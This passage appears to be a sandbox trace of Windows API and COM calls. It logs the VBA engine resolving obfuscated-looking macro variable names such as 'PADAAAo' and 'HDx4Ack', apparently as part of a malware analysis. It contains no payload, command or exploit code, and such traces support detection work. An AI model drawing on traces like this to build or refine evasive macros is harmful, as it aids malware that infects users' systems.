(in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.144] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.144] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.144] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.144] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.144] IUnknown:Release (This=0x665ba50) returned 0xd [0069.144] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.144] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.144] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.144] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.144] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.144] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.145] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.145] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.145] IUnknown:Release (This=0x665ba50) returned 0xd [0069.145] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.145] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.145] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.145] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.145] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.145] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.145] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.145] IUnknown:Release (This=0x665ba50) returned 0xd [0069.145] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.145] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.145] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.145] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.145] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.145] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.145] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.145] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.146] IUnknown:Release (This=0x665ba50) returned 0xd [0069.146] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.146] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.146] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.146] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.146] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.146] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.146] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.146] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.146] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.146] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.146] IUnknown:Release (This=0x665ba50) returned 0xd [0069.146] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.146] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.146] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.146] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.146] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.146] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.146] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.146] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.147] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.147] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.147] IUnknown:Release (This=0x665ba50) returned 0xd [0069.147] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.147] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.147] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a626b2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="PADAAAo") returned 8 [0069.147] ITypeComp:RemoteBind (in: This=0x665ba60, szName="PADAAAo", lHashVal=0x10ee42, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a626b2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="PADAAAo") returned 8 [0069.147] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="PADAAAo", lHashVal=0x10ee42, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a626b2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="PADAAAo") returned 8 [0069.147] ITypeComp:RemoteBind (in: This=0x665bd30, szName="PADAAAo", lHashVal=0x10ee42, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.147] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PADAAAo") returned 0x10ee42 [0069.147] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="PADAAAo" | out: _Dst="PADAAAo") returned 0x0 [0069.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="PADAAAo") returned 8 [0069.147] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.147] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="PADAAAo", lHashVal=0x10ee42, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.147] IUnknown:Release (This=0x665ba50) returned 0xd [0069.147] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.147] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="PADAAAo", lHashVal=0x10ee42, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.148] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.148] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.148] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="PADAAAo", lHashVal=0x10ee42, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.148] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.148] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.148] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="PADAAAo", lHashVal=0x10ee42, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.148] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a626b2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="PADAAAo") returned 8 [0069.148] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="PADAAAo", lHashVal=0x10ee42, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.148] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.148] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a626b2 | out: _Dst=0x67c2d40) returned 0x0 [0069.148] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_PADAAAo") returned 0x10e245 [0069.148] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_PADAAAo" | out: _Dst="_B_var_PADAAAo") returned 0x0 [0069.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_PADAAAo") returned 15 [0069.148] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.148] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_PADAAAo", lHashVal=0x10e245, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.148] IUnknown:Release (This=0x665ba50) returned 0xd [0069.148] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.148] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_PADAAAo", lHashVal=0x10e245, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.148] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.148] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.148] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_PADAAAo", lHashVal=0x10e245, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.148] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.148] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.148] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_PADAAAo", lHashVal=0x10e245, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.148] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.148] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.148] IUnknown:Release (This=0x665ba50) returned 0xd [0069.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b114ee, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_PADAAAo") returned 15 [0069.149] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_PADAAAo", lHashVal=0x10e245, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x50005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x50005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.149] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a626b2 | out: _Dst=0x144ec0) returned 0x0 [0069.149] ITypeComp:RemoteBind (in: This=0x665ba60, szName="HDx4Ack", lHashVal=0x1090f1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a627a2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="HDx4Ack") returned 8 [0069.149] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="HDx4Ack", lHashVal=0x1090f1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a627a2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="HDx4Ack") returned 8 [0069.149] ITypeComp:RemoteBind (in: This=0x665bd30, szName="HDx4Ack", lHashVal=0x1090f1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.149] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HDx4Ack") returned 0x1090f1 [0069.149] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="HDx4Ack" | out: _Dst="HDx4Ack") returned 0x0 [0069.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="HDx4Ack") returned 8 [0069.149] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.149] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="HDx4Ack", lHashVal=0x1090f1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.149] IUnknown:Release (This=0x665ba50) returned 0xd [0069.149] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.150] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="HDx4Ack", lHashVal=0x1090f1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.150] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.150] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.150] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="HDx4Ack", lHashVal=0x1090f1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.150] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.150] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.150] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="HDx4Ack", lHashVal=0x1090f1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.150] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a627a2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="HDx4Ack") returned 8 [0069.150] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="HDx4Ack", lHashVal=0x1090f1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.150] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.150] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a627a2 | out: _Dst=0x67c2d40) returned 0x0 [0069.150] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_HDx4Ack") returned 0x109475 [0069.150] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_HDx4Ack" | out: _Dst="_B_var_HDx4Ack") returned 0x0 [0069.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_HDx4Ack") returned 15 [0069.150] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.150] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_HDx4Ack", lHashVal=0x109475, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.150] IUnknown:Release (This=0x665ba50) returned 0xd [0069.150] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.150] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_HDx4Ack", lHashVal=0x109475, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.150] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.150] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.150] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_HDx4Ack", lHashVal=0x109475, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.150] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.150] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.150] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_HDx4Ack", lHashVal=0x109475, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.150] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.151] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.151] IUnknown:Release (This=0x665ba50) returned 0xd [0069.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1151e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_HDx4Ack") returned 15 [0069.151] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_HDx4Ack", lHashVal=0x109475, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x48005f00720061, ppTypeComp=0x41003400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x48005f00720061, ppTypeComp=0x41003400000000, pDummy=0x0) returned 0x0 [0069.151] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a627a2 | out: _Dst=0x144ec0) returned 0x0 [0069.151] ITypeComp:RemoteBind (in: This=0x665ba60, szName="roAQXo", lHashVal=0x102bb8, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6277a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="roAQXo") returned 7 [0069.151] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="roAQXo", lHashVal=0x102bb8, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6277a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="roAQXo") returned 7 [0069.151] ITypeComp:RemoteBind (in: This=0x665bd30, szName="roAQXo", lHashVal=0x102bb8, wFlags=0x5, 